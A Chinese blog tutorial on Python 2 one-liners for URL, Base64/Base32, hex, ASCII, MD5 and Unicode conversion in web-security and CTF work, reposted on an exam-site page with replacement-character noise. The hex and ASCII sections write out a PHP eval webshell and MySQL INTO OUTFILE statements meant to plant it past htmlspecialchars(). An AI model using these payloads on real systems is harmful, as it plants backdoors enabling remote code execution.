python妙用之編碼的轉換詳解
記得剛入門那個時候����,自己處理編碼轉換問題往往是“百度:url解碼����、base64加密、hex……”���,或者是使用一款叫做“小葵多功能轉換工具”的軟件�����,再后來直接上Burpsuite的decoder功能��,感覺用的還挺好的�。不過,也遇到些問題:在線轉換效率低(搜索占去了2/3的時間)��、兩款工具存在一些小問題�,比如burp中涉及中文往往顯示亂碼。
直到使用python來作為我日常編碼轉換工具……
開啟py轉換之旅
url編碼
url編碼是一種瀏覽器用來打包表單輸入的格式.可謂是一名作為web人員最熟悉的一種編碼方式了���。
>>> from urllib import *
>>> quote("union select null,null,null")
'union%20select%20null%2Cnull%2Cnull'
>>> unquote("union%20select%20null%2Cnull%2Cnull")
'union select null,null,null'
>>> urlencode({'x':'2333','y':'666'})
'y=666&x=2333'
Base64
Base64常常用作網(wǎng)頁表單和HTTP傳輸?shù)囊恍﹨?shù)���,也常用于郵件協(xié)議傳輸用戶信息等。
>>> import base64
>>> base64.b64encode("admin")
'YWRtaW4='
>>> base64.b64decode('YWRtaW4=')
'admin'
記得有次ctf比賽中考到了base32解密���,一般網(wǎng)站不提供在線解密���,一時之間貌似沒有辦法繼續(xù)下去。不過如果你使用python的話會像上邊解密base64一樣簡單��,只需要將函數(shù)改變下:
>>> import base64
>>> base64.b32encode('jjjjj')
'NJVGU2TK'
>>> base64.b32decode('NJVGU2TK')
'jjjjj'
Hex
十六進制編碼也是web application中常見的一種編碼方案�����。作為一名web安全人員,我們心知肚明的是����,MySQL注入可以使用hex繞過htmlspecialchars()函數(shù)從而寫入webshell。
比如:
select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'
下面是python實現(xiàn)hex加解密的方法:
>>> '<?php @eval($_POST[a]); ?>'.encode('hex')
'3c3f70687020406576616c28245f504f53545b615d293b203f3e'
>>>
>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')
<?php @eval($_POST[a]); ?>
>>>
ASCii
MySQL中的char()函數(shù)則是轉換ascii碼的�,正因如此,也可以使用這個特性來繞過htmlspecialchars()函數(shù)�。
比如:
select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'
使用python將字符串轉換ascii很簡單,但是逆轉換的話需要需要點小操作:
>>> map(ord, "<?php phpinfo() ?>")
[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print chr(112)
p
>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print ''.join(map(chr,l)) #感謝pcat表哥指出的方法
<?php phpinfo() ?>
Md5
md5在web安全界可以說是人盡皆知了���,以他的不可逆性��,大多數(shù)網(wǎng)站存儲用戶密碼等關鍵數(shù)據(jù)時常常使用md5加密��。有的時候我們提交payload需要md5加密����,這個時候用下面的方法就可以輕松實現(xiàn)��。當然解密的話推薦去cmd5����。
>>> from hashlib import md5
>>> m = md5()
>>> m.update('this is a secret')
>>> m.hexdigest()
'7dbbcee180ba4d456e4aa1cfbdad9c7b'
>>> m.hexdigest()[8:-8]
'80ba4d456e4aa1cf'
>>>
Unicode轉中文
unicode轉換中文,很多情況下都能遇到���。尤其是在做滲透測試的時候���。用burp的話會存在中文亂碼的問題,在python下實現(xiàn)非常簡單�。
>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"
你需要重新登陸
總結
python實際上在實際使用中非常方便,編碼轉換只是其中一個例子�。文中提到的編碼轉換皆為筆者日常積累,如果有沒有涉及到的地方�,歡迎評論補充。
CDA數(shù)據(jù)分析師考試相關入口一覽(建議收藏):
? 想報名CDA認證考試�����,點擊>>>
“CDA報名”
了解CDA考試詳情��;
? 想學習CDA考試教材��,點擊>>> “CDA教材” 了解CDA考試詳情�����;
? 想加入CDA考試題庫��,點擊>>> “CDA題庫” 了解CDA考試詳情;
? 想了解CDA考試含金量����,點擊>>> “CDA含金量” 了解CDA考試詳情;
京公網(wǎng)安備 11010802034615號
經(jīng)營許可證編號:京B2-20210330